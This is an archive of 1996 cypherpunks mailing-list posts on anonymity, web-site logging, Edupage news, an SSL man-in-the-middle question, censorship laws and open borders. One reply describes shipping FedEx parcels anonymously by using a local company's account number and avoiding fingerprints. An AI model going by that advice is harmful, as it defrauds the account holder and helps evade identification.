The only information that I have the need to collect is the I.P. (internet
protocol) address of the postee. The purpose of this being that I can
prevent them posting to my site if they repeatedly post off-topic or
abusive posts. In the past I have used this to prevent stock touting on my
website and have banned whole sub-domains. (since the i.p. address may be
general to the sw region of ATT or AOL). This is all mentioned on the top
of the post page (http://www.tradesmart.com/rumor/post.html) that people
have to scroll through to get to the posting section. Other information
that is automatically collected (by the web server) is the domain name/I.P.
address of the people visiting the web site. This allows me to see who (in
a very general sense) access my web site.

This information is freely available to anyone visiting my website...and I
frequently advertise this fact. You can obtain your own copy of the traffic
report at this web site by going to:

http://www.tradesmart.com/cgi-bin/surfreport.html

just fill in your email address and wait. The results will be emailed to
you. You do not need to wait for the reply..since the stats processing
takes time.

good luck on your endeavours and feel free to post something on the Rumor
Mill. Whether anonymous or pubicly.

Martin Leach
Webmaster of the Biotech Rumor Mill.


Arthur E. Sowers (arthures@access.digex.net) wrote:

: Folks, I decided to visit this web site and tell all of you a few things
: you ought to keep in mind.

: First, the review: Yes, the "Rumor Mill" is a sort-of web-site
: "newsgroup". The majority of posts and responses that I saw (not counting
: the archives) were by "anonymous" posters. A good many were not
: particularly "hot" (such as "why is company 'X' stock dropping?" and some
: inane comments). Some were cryptic (meaning to the average person, they
: might be essentially meaningless). Most were very short (1-2 sentences). A
: few posts did have some information that I downloaded for use later. One
: or two mentioned lawsuits (patent infringement).

: Second, the warning: The Rumor Mill lets you post anonymously (as far as I
: could see, but I did not try it) but THAT DOES NOT MEAN THAT SOMEONE WILL
: NOT KNOW WHO YOU ARE. I don't know how the Rumor Mill is operated, but I
: do know that websites CAN be configured to capture information about
: browser users who access that site! They can get a large amount of
: information about you including your name, email address, all sorts of
: information about your domain & ISP, etc. Your anonymous post may appear
: to everyone else as anonymous, but the sysop (webmaster) at that site
: should be presumed to be capable of determining who you are. I myself have
: seen website "hit statistics" and believe me, it all shows up. You should
: look in your Web Browser directory for the <cookies.txt> file and note
: that some web sites that you visit will put short lines of data into your
: file. You might try to change the attributes on that file to "read only"
: and see what happens. Sometimes it will thwart the web site, sometimes it
: will give you an error message. As a matter of fact, I did click on one
: button and my netscape security window opened up to warn me that the
: channel to that site was not secure. What else is related to this? There
: are a number of anonymous remailers out in cyberspace, but it has been
: stated by a knowledgeable source that a number of them are being operated
: by law enforcement agencies (presumably to troll for criminal activity). A
: website which allows rumors to be posted anonymously, especially involving
: commercial business details (i.e. proprietary) but carries at least
: no disclaimer that the sysop or sponsors do not use hit statistics data
: to correlate it with anonymous posters and thereby determine or attempt to
: determine thier identity is a website that I would avoid using. In the
: worlds of politics, leaks, trial-baloons, rumor, inuendo, insinuations,
: etc. are common and make for entertaining reading for those who enjoy it.
: But in the world of commerce, the wrong blip in the wrong place can lead
: to lawsuits, prosecution (by, for example, the Securities and Exhange
: Commission), and other personal information, identity, etc., to fall into
: hands that I would hope smart people might think about before they make
: posts. I have the feeling that a simple post to a newsgroup through a
: remailer would be safer that an anonymous post to the Rumor Mill. At
: least, I would get into the configuration dialog boxes on your web browser
: and leave "your name" and "your email address" blank, or put in a dummy
: name. But then, you can figure out that this is a way to also send forged
: mail (there was a "fake mail" website about a year or two ago, but the
: sysops eventually shut it down). There is in fact a website out there that
: says it can be used for anonymous web browsing (and I expect at some time
: in the future that they will start charging for its use [think for a
: minute why these would exist and it will be obvious]), but where I have
: that little snit of paper is burried on my desk with mountains of
: uncolated paperwork (sorry).

: What dothey say about "buyer beware?" Caveat emptor?

: Eh?

: Art Sowers


: =======
: On 29 Aug 1996, Linda St. James wrote:

: > Do you want to have a little fun and perhaps learn something about the
: > current state of the biotechnology industry?
: >
: > Have you a particular company you've been interested in that you'd like
: > more information on -- but the "inside scoop" seems better than an
: > official company profile?
: >
: > IF SO ---
: >
: >
: > Please take a look at Dr. Martin Leach's BIOTECH RUMOR MILL, one of the
: > most fascinating sites on the WWW for the biotechnologist.
: >
: > In this site, Martin goes to great lengths to have an "all in one
: > location" center for biotechnology news. Whether it is the daily reports
: > from PR Newswire, or his reader surveys, you are bound to find something
: > of interest. But, to prove that the internet imitates real life, some of
: > the most interesting tidbits are pure rumor.
: >
: > In this site, you and your colleagues have an opportunity to post
: > information in a completely anonymous fashion. Some of the biggest news in
: > the biotechnology business comes out of the "Rumor Mill" before it hits
: > the trade journals, or even the Wall Street Journal! Of course, you have
: > to remember that in any forum where anyone can post anonymously, there is
: > a certain amount of frivolity as well. But what fun!
: >
: > Search Masters International, an industry-leading search firm specializing
: > in Biotechnology, Pharmaceuticals, and Medical Device industries, is now a
: > sponsor of this site along with Research Diagnostics.
: >
: > Take a look at your earliest convenience:
: >
: > The Biotech Rumor Mill is at: http://www.tradesmart.com/rumor
: >
: > The Search Masters International home page is at: http://smi.bio.com/
: >
: > Best regards,
: >
: > Linda St. James, Office Manager
: > Search Masters International
: > Five Hundred Foothills South, Suite #2
: > Sedona, AZ 86336
: > (520) 282-3553 Phone or (520) 282-5881 Fax
: > email to lindasj@sedona.net
: >
: >


---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 10 Sep 1996 14:50:50 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 8 Sept 1996
Message-ID: <01I9AJIWWX1O9ULM12@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu"  9-SEP-1996 11:29:04.71

>************************************************************
>Edupage, 8 September 1996.  Edupage, a summary of news about information
>technology, is provided three times a week as a service by Educom,
>a Washington, D.C.-based consortium of leading colleges and universities
>seeking to transform education through the use of information technology.
>************************************************************

[...]

>SCIENTOLOGISTS FIGHT FOR COPYRIGHT PROTECTION ON NET
>Police investigators in Helsinki say the Internet "anonymous remailer" site
>anon.penet.fi was shut down partially because of a copyright dispute with
>the Church of Scientology (and not because the site was a primary conduit
>for child pornography, as was previously reported).  The Church of
>Scientology, which has been successful in convincing the courts that its
>teachings are validly copyrighted material, was pursuing an individual who
>used the anonymous remailer site to post Scientology texts without the
>Church's permission.  The operator of the site decided to close it down
>rather than reveal the individual's name to Helsinki police.  The Church
>says it was not opposing the existence of the server:  "We have no
>opposition to there being anonymity for private, consensual communications.
>What we oppose is using anonymous servers for the purpose of permitting
>criminal or other unlawful acts."  (New York Times 6 Sep 96 C2)

	Why don't I believe the first portion of that statement?

[...]

>COPYRIGHT LAW ARCHIVED ON THE NET
>The Stanford University library is working with the Council on Library
>Resources to compile an electronic archive of information on copyright law
>in an effort to keep educators and others aware of the ongoing debate over
>the "fair use" doctrine.  The Stanford site < http://fairuse.stanford.edu >
>contains the full text of court decisions, legislation and international
>copyright agreements, as well as related articles on the topic.  (Chronicle
>of Higher Education 6 Sep 96 A42)

>NEW ANGLE ON WEB SURFING
>BroadVision's new Web site, called The Angle, features the company's
>One-To-One intelligent agent and WebPoint content management technologies.
>"What intranets are looking for are ways to help users of their site get
>information they need, and are entitled to, quickly and efficiently without
>too much surfing," says the company's CEO, who touts his service as an
>efficiency-booster for corporate technology managers.  Unlike its rival,
>Firefly, which is used to direct music seekers to selections they might like
>based on similar buyers' tastes, the One-To-One agent software is built on
>rule-based reasoning.  BroadVision is considering licensing Firefly's
>technology, which uses a personalization algorithm to identify trends among
>users and personal tastes, to expand its offerings.  (Interactive Age
>Digital 4 Sep 96)

[...]

>CONGRESS, NOT THE COURTS, TO RESOLVE COPYRIGHT ISSUES
>The U.S. Patent and Trademark Office is shifting gears in its drive to
>resolve electronic copyright issues, and is now working with members of
>Congress to develop a legislative solution to the issue of online service
>provider liability, which has been a sticking point in efforts to pass new
>copyright legislation.  "We are looking for a way to define the nature of
>the provision of mere telecommunications services, for which
>telecommunications providers should bear no liability for copyright
>infringement.  We are trying to define where the dividing line is between
>someone who actively engages in the provision of information versus someone
>who is a mere conduit," says a senior legal counselor for the PTO.  The PTO
>originally believed these issues could be resolved through the court system,
>but now says it will work with Congress and industry to develop legislative
>solutions.  (BNA Daily Report for Executives 4 Sep 96 A4)

	Eeep... I trust the courts more than people selected by a popularity
contest. Remember that various of the worse CDA-replacement bills had in
them provisions for CDA-like filtering being protected from liability? To
me, that's a pretty clear government sponsorship of such filtering, which
makes it censorship.

[...]

>WHERE WIZARDS STAY UP LATE
>The NY Times Sunday Book Review says the Hafner/Lyon book on the origins of
>the Internet ("Where Wizards Stay Up Late") compiles a great deal of
>much-needed information and "shows just how striking an innovation and
>collaboration the Arpanet really was.  One central focus of the book
>(excerpted in the Sep/Oct Educom Review) is the contribution of the
>brilliant psychologist and computer scientist J.C.R. Licklider, who
>predicted an era when "human brains and computing machines will be coupled
>.... tightly, and ... the resulting partnership will think as no human brain
>has ever thought and process data in a way not approached by the
>information-handling machines we know today."  (New York Times Book Review 8
>Sep 96 p19)

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.

>Technical support is provided by Information Technology Services at the
>University of North Carolina at Chapel Hill.

>************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Niccolo Machiavelli  (if your name is Niccolo Machiavelli ;  otherwise,
>substitute your own name).  ...  To cancel, send a message to:
>listproc@educom.unc.edu with the message: unsubscribe edupage.   (If you
>have subscription problems, send mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 10 Sep 1996 15:39:40 +0800
To: attila <attila@primenet.com>
Subject: Re: take the pledge
In-Reply-To: <199609080352.VAA15611@InfoWest.COM>
Message-ID: <Pine.BSF.3.91.960909232407.3585A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Better late than never, I suppose. :)

- r.w.



On Sun, 8 Sep 1996, attila wrote:

>         Alright!   it's a genuine PerryGram!  I'll take the pledge; 
>     I've never been able to answer Sternlight without being 
>     significantly more offensive than usual!
> 
>         attila
> 
>  --
>  one of the few things we all share: 
>    the utter, corrosive contempt for our elected officials.
> 
> 
>     --------------------------------------------------------
> 
> In, on 07/19/96 
>    at 12:06 PM, "Perry E. Metzger" <perry@piermont.com> said:
> 
> =Subject: take the pledge
> 
> 
> =Look, folks, we all know that 99% of what David Sternlight posts is
> =garbage. Why don't we all pledge not to answer any of his posts, and
> =then he'll go away. If necessary, someone can be appointed to post a
> =weekly "the views expressed by David are junk and we are deliberately
> =not replying to them directly" message.
> 
> =David has plenty of places to argue with the wind. We don't need to
> =add this one.
> 
> =I'd like to ask people to publically pledge that they will not reply
> =to David's messages. This is such a pledge.
> 
> =Perry
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 10 Sep 1996 14:35:21 +0800
To: CypherPunks <cypherpunks@toad.com>
Subject: Re: Satellite Movement?
In-Reply-To: <960909031224_102540.2453_HHV82-1@CompuServe.COM>
Message-ID: <199609100335.XAA26422@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Its messages like this that make me feel happy that I no longer make
reading cypherpunks an important priority in my day.

Blak Dayz writes:
> 	I was out buying groceries and after they scanned the shit through they
> told me that all the ATMs in the City were out due to connection problems. So
 i
> go home and start trying to scan for the shits and i cant find them. If anyon
e
> knows what the hell happened i would appreciate the details. I believe it may
> have been a solar flare that caused the companies to redirect their satellite
s.
> It would do me alot of help considering i had to pay CASH (i hate paper) for 
the
> stuff and i would like to complain to the fucking JPL and satt. operators abo
ut
> them warning the public.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 10 Sep 1996 15:38:33 +0800
To: Steve Schear <azur@netcom.com>
Subject: Re: Anonymous FedEx, was: What is the EFF doing exactly?
In-Reply-To: <v02130500ae599518f546@[10.0.2.15]>
Message-ID: <Pine.BSF.3.91.960909234259.3585C-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 9 Sep 1996, Steve Schear wrote:

> >David Lesher wrote:
> 
> >Try & mail an anonymous FedEx package.
> 


I FedEx'd some packages w/ "rabid wombat" as the sender's name, and the 
local FedEx office's address as the return. The packages went through. 
International. Amazing.


> Not a problem.  You merely use the FedEx number of local company.  Get
> FedEx forms from an unmanned FedEx pick-up point, fill one in (using an
> impact printer, if desired, to simulate the appearance of the pre-addressed
> forms given to their regular customers), attach to parcel and drop it in
> the box (no finger prints please).
> 
> Works like a charm.
> 
> 
> 
> PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
> ---------------------------------------------------------------------
> Snoop Daty Data           | Internet: azur@netcom.com
> Grinder                   | Voice: 1-702-655-2877
> Sacred Cow Meat Co.       | Fax: 1-702-658-2673
> 7075 W. Gowan Road, #2148 |
> Las Vegas, NV 89129       |
> ---------------------------------------------------------------------
> 
> Just say NO to perscription DRUGS.
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Tue, 10 Sep 1996 11:03:36 +0800
To: cypherpunks@toad.com
Subject: U.S. Presidential Odds Are In
Message-ID: <199609092200.AAA10566@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello, I am the anonymous oddsman, here with the U.S. presidential odds, kindly provided to me by a person who wishes to remain anonymous. Some of you know who I am, and I would prefer that my true identity remain a mystery, as what I am doing may well be slightly illegal AFAIK. Thank you.

Ladbroke's customer service person [number +44 181 8621820 (that's a London area code)] looked up the info.  He had to call someone else to get Perot's odds. Next time (if they even have them) Harry Browne odds.

Here's what Ladbroke's said today:

1:7 Clinton
4:1 Dole
50:1 Ross Perot

That's all for today, this information will be posted aproximately weekly, but more often as the election approaches or major events happen, and certianly more often if my posting it appears to be somehow annoying U.S. authorities. ;) 
the anonymous oddsman











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 10 Sep 1996 17:05:29 +0800
To: cypherpunks@toad.com
Subject: Re: Crypto Anachy MUD
Message-ID: <ae5a60e6220210042880@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:10 AM 9/10/96, Jon Leonard wrote:
>Duncan Frissell wrote:
>> Did anyone make the point (I gave up on the thread) that we already have a
>> great Crypto Anarchy MUD with lots of the coding already done.  We call it
>> the Internet.  Digital cash, strong crypto, remailers, everything.
>
>Tim May expressed doubt that it was worth the effort:  Not much easier
>than the real thing, and not as good.  That's the closest to your point,
>I think.
....
>Finally, a MUD has the potential to spread crypto-anarchic ideas to people
>who would not otherwise have considered them.
>
>It may be that I'm wasting my time, but I could come up with some useful
>new crypto protocol too.

Don't tar me with the "Tim said it was a waste of time" label. Rather, I
said I thought it would be pretty tough to get a reasonable ontology, one
with rich enough behaviors and reasonable incentives and disincentives.
Simulations are an art...they were useful in nuclear war planning, where
the degrees of freedom were constrained, and so on.

I agree that various cryptographic and crypto anarchic constructs can be
"faked" in a game (MUD) that cannot be reasonably implemented at this time
in the real world.

Note: Didn't Steve Jackson Games have something called "GURPS Cyberpunk"
which was somewhat similar?

Anyway, good luck and have fun.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 10 Sep 1996 18:05:14 +0800
To: Barbara Gamble <bgamble@wo0033wp.wo.blm.gov>
Subject: Re: Test...sorry about this - Reply - Reply
Message-ID: <199609100742.AAA18190@dfw-ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:07 PM 9/9/96 -0500, you wrote:
>I subscribed just once, real name. Yep, the Welcome msg is ReallyTrulyFine[M].
> I reallytrulyread it.  High-traffic, though, is relative.  In light of
>Z.B.'s post , I thought that maybe I , too, had a mail probem.  Seriously,
>thanks for the info.  

BTW, if it's too much of a flood, you can read it with a newsreader
at nntp.hks.net

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Tue, 10 Sep 1996 19:53:10 +0800
To: "kamml@secret.org>
Subject: Re: What is the EFF doing exactly?
Message-ID: <19960910083723906.AAJ105@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 9 Sep 1996 10:51:04 -0400, kamml@secret.org wrote:

>>> Try and pay cash in most Fedex offices.

>>I always do and as long as I have exact change I have never been
>>hassled.

>Fedex will not accept cash in New York City. I have tried to pay cash and
>been refused. I have talked to customer service and confirmed that they
>will not accept cash in NYC although they will elsewhere.

You could try the "Really?  Could I borrow a phone book for a minute? I need to
get UPS's number." approach. It has been known to work... <g>

- "'Anonymity is bad,' says a source who wishes to remain anonymous." - Nuff' said.
* Home: Chris Adams <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
* Autoresponder: send email w/subject of "send resume" or "send PGPKEY"
* Work: cadams@acucobol.com | V.M. (619)515-4894 | (619)689-6579
* Member in good standing of the GNU whirled hors d'oeuvre





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I~nigo Gonzalez" <nexus@adv.es>
Date: Tue, 10 Sep 1996 11:28:32 +0800
To: best-of-security@suburbia.net
Subject: Can you trust your ISP ??
Message-ID: <3234A158.3492@adv.es>
MIME-Version: 1.0
Content-Type: text/plain


Hello, 
   I'm thinking about how can I get rid off this kind of attack *before* it 
happens. Can you please send me your comments about this? I don't know so 
much about the how SSL works, but I think this is something that can 
happen...

SCENARIO
--------

1) Suppose We have a host with https protocol enabled, and someone 
outside wish to access the information we have on the server via https; 
but (for some reason wich we don't know), the connection has to be made 
through the Gateway named X (see plain diagram below):
                                 
     Outside <-------------> Gateway X <---------------> Our Server

2) I think that when a Secure Socket Layer connection begin this is what it 
happens:

  a) Outside generates a private/public key pair and he send us
     his public key, wich has to go through Gateway X, who send 
     it to Our Server.

  b) Our Server generates his own private/public key pair and send
     his public key (whether it's sent ciphered or not doesn't 
     matter... yet).

  c) Now both parts have their response public keys, ciphered
     transaction begins. 

All seems to be fine, but...

3) Suppose that We don't trust on what's going on through the line, and 
that IN FACT, someone in Gateway X is disturbing our communications like 
this:

  a) When Outside's public key comes to the gateway, Gateway X generates
     a public/private key pair (wich we will call spoofed keys),
     and it send a spoofed IP header marked as from "Outside" in order
     to act as "Outside" for "Our Server".

  b) Once "Our server" send his public key, "Gateway X" intercept the
     packet, decrypts it if necessary (because it has the private key
     needed to decrypt it), and it send "Outside" the public spoofed
     key (remember what it did on stpe a?).

  c) Now transaction takes place through "Gateway X", wich can read
     modify, and fake any data because it has now the ability to act
     as the other side to both "Outside" and "Our Server"...

Avoid the problem:

   - The *only* think I can figure out to avoid the menace is to have a 
certified (Verisign and others) public key with a short expiration date.

  Of course this approach has a little problem: *how* can I verify that 
once expired "Our Server's" public key is really "Our Server's" key... a 
Certification Authority is something worth of spoofing... ;-) Maybe the 
best thing could be becoming my own certification authority... but how!?

  If for *some* reason the above cannot be done, the a simple way to avoid 
too much trouble is to limit transactions to just *atomic* transactions 
(checking account and getting some money are two different transactions). 
This can still be spoofed if "Gateway X" makes its own transaction with 
faked Outside's keys. Of course, We must limit the tansactions we accept in 
"Our Server". Notice that a password and challenges are useless in this 
kind of situations.

¿Any other way? maybe we can get somethig a bit safer if we found something 
fixed, inmutable and rely on it (acting like some kind of virtual 
communication channel between Outside and Our Server:

                             Untrusted
     Outside <-------------> Gateway X <---------------> Our Server
        ^                                                     ^
        |                                                     |
        \-------- Virtual secure communication channel -------/

       
If every message "Outside" send to "Our Server" must have a response, then 
we could make "Our Server" send responses with some good (well tought) 
cryptographic technique wich will refer somehow to "Outside's" message 
fingerprint.

I mean, every message from the Outside must have a message signature (i.e 
message must pass through MD5); and its response must have a valid 
"Response to: <query's MD5 signature>" and (of course) that response must 
be signed somehow. I still don't know how to do it well; but I will tell 
you how as soon as I will know.

Thank you for wasting your time reading this.
--
  Iñigo González - ADV Internet Technical Advisor <nexus@adv.es>
  "Never say anything online that you wouldn't want to see on the
  front page of The New York Times." - alt.2600.moderated Posting





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Camp <benc@geocel.com>
Date: Tue, 10 Sep 1996 17:05:55 +0800
To: Eric Murray <nexus@adv.es (I~nigo Gonzalez)
Subject: Re: BoS: Can you trust your ISP ??
Message-ID: <2.2.32.19960910063040.006e5128@lithium>
MIME-Version: 1.0
Content-Type: text/plain


Any sort of Certificate authority based protocol is dumb.  It's like RSAC
charging 500 bucks for rating a web site.  Nothing anyone does on the web is
important enough to encrypt.  

Anyway, as far as SSL goes...we've all heard about how proactive Netscape is
in preventing key comprimise.  

Its too late.

Ben Camp

At 06:49 PM 9/9/96 -0700, Eric Murray wrote:
>I~nigo Gonzalez writes:
>> 
>> Hello, 
>>    I'm thinking about how can I get rid off this kind of attack *before* it 
>> happens. Can you please send me your comments about this? I don't know so 
>> much about the how SSL works, but I think this is something that can 
>> happen...
>
>[classic Man-in-the-Middle attack]
>
>
>What you described is the Man In The Middle attack, often
>abbreviated on these lists as MITM.  The fact that there's
>an abbreviation for it should indicate to you how often
>it is discussed.  However it's also one of the first
>problems (besides the basic encryption) that protocol
>designers think of.
>
>It's been taken care of in SSL3- the server's certificate
>must be signed by a CA that the client trusts.  Unless
>the digital signature can be spoofed, and it probably
>can't be, the client can be certain that the server certificate it got
>is really from the server that it claims to be from.
>
>Assuming that RSA still can't be broken, the client can be sure
>that the pre-master-key material that it sends to the server
>(and which is the basis for the symmetric crypto session keys)
>will not be compromised.
>
>
>If you grab a copy of the SSL3 spec (from netscape's web site)
>and read the appendicies there's more good stuff about possible
>attacks and what's been done to counter them.
>
>
>
>
>-- 
>Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
>Principal, LNE Consulting: SSL, crypto applications, Internet security.
>PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF
>
>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 10 Sep 1996 22:45:51 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: China joins Singapore, Germany, ....
In-Reply-To: <ae59b4b317021004b37a@[207.167.93.63]>
Message-ID: <Pine.SUN.3.91.960910040340.12836F-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


The revised Hatch "child porn" legislation criminalizes even *attempting* 
to download the forbidden data. And has two definitions of child porn 
that create a kind of legal buffet for prosectors' delectation.

-Declan


On Mon, 9 Sep 1996, Timothy C. May wrote:

> Even here in the United States, connecting to an illegal site may mean
> imprisonment. (The charge: trafficking in child pornography, for example.)
> 
> Rather than saying such laws are "meaningless," developing blinded,
> steganographic, etc. proxies may be a more useful strategy.
> 
> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Tue, 10 Sep 1996 21:57:33 +0800
To: Dale Thorn <dthorn@gte.net>
Subject: Re: TWA 800 - Serious thread.
In-Reply-To: <32349A90.51BD@gte.net>
Message-ID: <Pine.SUN.3.91.960910041133.12836I-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Last night I started reading "Main Justice," by Pulitzer-winner Jim McGee
and Brian Duffy, about the DoJ's recent history of organized crime/drug
war fighting and wiretapping. 

The book describes how Federal agencies have been granted more leeway in
terms of entrapment thanks mostly to a conservative Supreme Court. Scary
stuff. 

-Declan


On Mon, 9 Sep 1996, Dale Thorn wrote:
> 
> Per the tendency of federal agencies to let it be publicly known that 
> they lie openly to trap suspects (and apparently this technique has been 
> OK'd for local enforcement as well):
> 
> This is going to backfire on them (and us), and probably has already.
> If govt. protects its "sources and methods", however nefarious, to the 
> extent that the public is never asked to assent to these methods (even 
> though a few of us know about them anyway), then the public doesn't have 
> to become overtly cynical about what's going on.
> 
> On the other hand, whether you think the people have this much right to 
> know or not, when the public consciousness embraces the concept that the 
> police openly and regularly lie (and that it's a "good thing" they do), 
> the result will be greater public cynicism, distrust, paranoia, hatred, 
> and anarchy (the bad kind).
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: NetSurfer <netsurf@pixi.com>
Date: Wed, 11 Sep 1996 06:25:41 +0800
To: cypherpunks@toad.com
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <1.5.4.32.19960909182501.00685618@pop3.interramp.com>
Message-ID: <Pine.SV4.3.91.960910055103.3896D-100000@netsurfer>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 9 Sep 1996, Will Rodger wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Why not? Because spammers _invariably_  forge the return addresses to keep
> exactly that from happening. Indeed, Cyber Promo claims it "had an

And then there are the network headers - you can usually see where the 
msg entered the net.  These people aren't usually clever enough to spoof 
the headers beyond the from and reply to fields.

#include <standard.disclaimer>
                    _   __     __  _____            ____
                   / | / /__  / /_/ ___/__  _______/ __/__  _____
                  /  |/ / _ \/ __/\__ \/ / / / ___/ /_/ _ \/ ___/
                 / /|  /  __/ /_ ___/ / /_/ / /  / __/  __/ /
================/_/=|_/\___/\__//____/\__,_/_/==/_/==\___/_/===============






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Sep 1996 22:15:47 +0800
To: cypherpunks@toad.com
Subject: Re: China joins Singapore, Germany, ....
Message-ID: <2.2.32.19960910110046.00de3c78@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:41 AM 9/9/96 -0700, Timothy C. May wrote:

>Prison sentences in Germany for those who reveal forbidden information
>about "the Holocaust," 

In a country where you get 10 months for stabbing a famous tennis star in
the back, prison isn't much of a penalty. 

>prison terms (or worse) for dissidents in Burma,
>China, and, of course, various other nations and "democratic people's
>republics."
>
>Even here in the United States, connecting to an illegal site may mean
>imprisonment. (The charge: trafficking in child pornography, for example.)

The percentage of total hits that will end in jail terms or executions is
meaninglessly small as a percentage of total hits, though.  You must admit
that a ban on 100 sites out of all the sites in the world is pretty
insignificant.  The swamping effects of thousands and soon millions of sites
means the governments of the world won't even be able to evaluate a
significant percentage even if they want to.  And all this *before* we apply
any of our technical fixes.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 10 Sep 1996 22:26:20 +0800
To: cypherpunks@toad.com
Subject: Re: Terrorists
Message-ID: <2.2.32.19960910110051.00dea4d0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:58 PM 9/9/96 -0700, Timothy C. May wrote:

>Remember, folks, it is _governments_ which interfere with natural movements
>of people, capital, but not birds.
>
>I don't want to jeopardize my reputation as a List.Racist, but I think one
>of the longterm (not in the next 15 years) implications of the things we
>talk about will be the increased lowering of national borders. (Yes, I have
>long talked about national borders being only speed bumps...here I'm
>talking about _physical_ borders.)

I assume defacto open borders pretty quickly.  We currently have 40 million
crossings a year (mostly us and Canadians) but as people get richer that is
bound to grow rapidly.  Since technology causes wealth and wealthy people
like to travel and governments don't like to block wealthy travelers and
travelers can increase faster than border guards swamping occurs.

What happens when 2000-passenger surface effect aircraft (or other new
travel technologies) start showing up on the market and la migra has to deal
with high volume travel.  They're having trouble with current levels at JFK
and Miami. They scale back. 

I'm not predicting de jure open borders just defacto open borders.  And with
those who work on the net being able to work from everywhere and nowhere,
they will be able to work in countries where they do not have work
authorization as easily as a novelist can today.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Wed, 11 Sep 1996 04:13:51 +0800
To: cypherpunks@toad.com
Subject: Re: ALPHACIPHER - An unbreakable encryption program.
In-Reply-To: <01bb9e75.fcf69000$a4dc9dcc@survival>
Message-ID: <960910.071433.8A6.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In alt.security, survival@aa.net writes:

[ attribution scrambled ]

>> True, but somehow I have a feeling that Alphacipher is not a one-time
>> pad, and thus is breakable.
>
> This assumption is not true.  ALPHACIPHER is, indeed, based upon an OTP. 
